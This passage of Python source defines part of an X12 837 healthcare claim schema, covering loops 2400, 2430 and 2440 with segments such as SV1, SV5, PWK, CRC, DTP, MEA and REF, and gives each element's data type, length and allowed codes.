Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "DTP", Properties( desc="Line Check or Remittance Date", position="5500", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="5505", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), 
position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), ) parsed_837_2440 = Loop( "2440", Properties( desc="Form Identification Code", looptype="", position="5510", repeat=">1", req_sit="S", ), Segment( "LQ", Properties( desc="Form Identification Code", position="5510", repeat="1", req_sit="R", syntax="C0102", ), Element( "LQ01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["AS", "UT"], ), ), Element( "LQ02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=2, codes=[], ), ), ), Segment( "FRM", Properties( desc="Supporting Documentation", position="5520", repeat="99", req_sit="R", syntax="R02030405", ), Element( "FRM01", Properties( desc="Assigned Identification", req_sit="R", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "FRM02", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=2, codes=["N", "W", "Y"], ), ), Element( "FRM03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "FRM04", Properties( desc="Date", req_sit="S", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "FRM05", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), ), ) parsed_837_2400 = Loop( "2400", Properties( desc="Service Line Number", looptype="", position="3650", repeat="50", req_sit="R", ), Segment( "LX", Properties( desc="Service Line Number", position="3650", repeat="1", req_sit="R", syntax="", ), Element( "LX01", Properties( desc="Assigned Number", req_sit="R", data_type=("N0", "1", "6"), position=1, codes=[], ), ), ), Segment( "SV1", Properties( desc="Professional Service", position="3700", repeat="1", req_sit="R", syntax="P0304", ), Composite( "C003", Properties( 
desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV101-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SV101-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV101-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV101-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV101-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV101-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV101-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV101-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "SV103", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["MJ", "UN"], ), ), Element( "SV104", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "SV105", Properties( desc="Facility Code Value", req_sit="S", data_type=("AN", "1", "2"), position=5, codes=[], ), ), Element( "SV106", Properties( desc="Service Type Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Composite( "C004", Properties( desc="Composite Diagnosis Code Pointer", refdes="", repeat="", req_sit="R", seq="07", ), Element( "SV107-01", Properties( desc="Diagnosis Code Pointer", req_sit="R", 
data_type=("N0", "1", "2"), position=0, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-02", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=1, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-03", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=2, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-04", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=3, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), ), Element( "SV108", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "SV109", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), Element( "SV110", Properties( desc="Multiple Procedure Code", req_sit="N", data_type=("ID", "1", "2"), position=10, codes=[], ), ), Element( "SV111", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=11, codes=["Y"], ), ), Element( "SV112", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=12, codes=["Y"], ), ), Element( "SV113", Properties( desc="Review Code", req_sit="N", data_type=("ID", "1", "2"), position=13, codes=[], ), ), Element( "SV114", Properties( desc="National or Local Assigned Review Value", req_sit="N", data_type=("AN", "1", "2"), position=14, codes=[], ), ), Element( "SV115", Properties( desc="Copay Status Code", req_sit="S", data_type=("ID", "1", "1"), position=15, codes=["0"], ), ), Element( "SV116", Properties( desc="Health Care Professional Shortage Area Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "SV117", Properties( desc="Reference 
Identification", req_sit="N", data_type=("AN", "1", "50"), position=17, codes=[], ), ), Element( "SV118", Properties( desc="Postal Code", req_sit="N", data_type=("ID", "3", "15"), position=18, codes=[], ), ), Element( "SV119", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=19, codes=[], ), ), Element( "SV120", Properties( desc="Level of Care Code", req_sit="N", data_type=("ID", "1", "1"), position=20, codes=[], ), ), Element( "SV121", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=21, codes=[], ), ), ), Segment( "SV5", Properties( desc="Durable Medical Equipment Service", position="4000", repeat="1", req_sit="S", syntax="R0405 C0604", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV501-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["HC"], ), ), Element( "SV501-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV501-03", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV501-04", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV501-05", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV501-06", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV501-07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV501-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV502", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", 
data_type=("ID", "2", "2"), position=2, codes=["DA"], ), ), Element( "SV503", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "SV504", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "SV505", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=5, codes=[], ), ), Element( "SV506", Properties( desc="Frequency Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["1", "4", "6"], ), ), Element( "SV507", Properties( desc="Prognosis Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), ), Segment( "PWK", Properties( desc="Line Supplemental Information", position="4200", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), 
Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "PWK", Properties( desc="Durable Medical Equipment Certificate of Medical Necessity Indicator", position="4200", repeat="1", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["CT"], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AB", "AD", "AF", "AG", "NS"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="4250", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", 
Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR3", Properties( desc="Durable Medical Equipment Certification", position="4350", repeat="1", req_sit="S", syntax="P0203", ), Element( "CR301", Properties( desc="Certification Type Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["I", "R", "S"], ), ), Element( "CR302", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["MO"], ), ), Element( "CR303", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "CR304", Properties( desc="Insulin Dependent Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "CR305", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=5, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance 
Certification", position="4500", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Hospice Employee Indicator", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["70"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["65"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), 
Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="Condition Indicator/Durable Medical Equipment", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["09"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["38", "ZV"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["38", "ZV"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=["38", "ZV"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=["38", "ZV"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=["38", "ZV"], ), ), ), Segment( "DTP", Properties( desc="Date - Service Date", position="4550", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["472"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Prescription Date", position="4550", repeat="1", req_sit="S", syntax="", ), 
Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="DATE - Certification Revision/Recertification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["607"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Begin Therapy Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["463"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Certification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["461"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), 
), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Test Date", position="4550", repeat="2", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["738", "739"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Shipped Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["011"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time 
Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "QTY", Properties( desc="Ambulance Patient Count", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["PT"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "QTY", Properties( desc="Obstetric Anesthesia Additional Units", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["FL"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "MEA", Properties( desc="Test Result", position="4620", repeat="5", req_sit="S", syntax="R03050608 L050412 L060412 
L07030506 E0803 P1112", ), Element( "MEA01", Properties( desc="Measurement Reference ID Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["OG", "TR"], ), ), Element( "MEA02", Properties( desc="Measurement Qualifier", req_sit="R", data_type=("ID", "1", "3"), position=2, codes=["HT", "R1", "R2", "R3", "R4"], ), ), Element( "MEA03", Properties( desc="Measurement Value", req_sit="R", data_type=("R", "1", "20"), position=3, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="04", ), ), Element( "MEA05", Properties( desc="Range Minimum", req_sit="N", data_type=("R", "1", "20"), position=5, codes=[], ), ), Element( "MEA06", Properties( desc="Range Maximum", req_sit="N", data_type=("R", "1", "20"), position=6, codes=[], ), ), Element( "MEA07", Properties( desc="Measurement Significance Code", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "MEA08", Properties( desc="Measurement Attribute Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "MEA09", Properties( desc="Surface/Layer/Position Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "MEA10", Properties( desc="Measurement Method or Device", req_sit="N", data_type=("ID", "2", "4"), position=10, codes=[], ), ), Element( "MEA11", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=11, codes=[], ), ), Element( "MEA12", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=12, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="4650", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), 
position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9B"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9D"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( 
desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "REF", Properties( desc="Line Item Control Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["6R"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( 
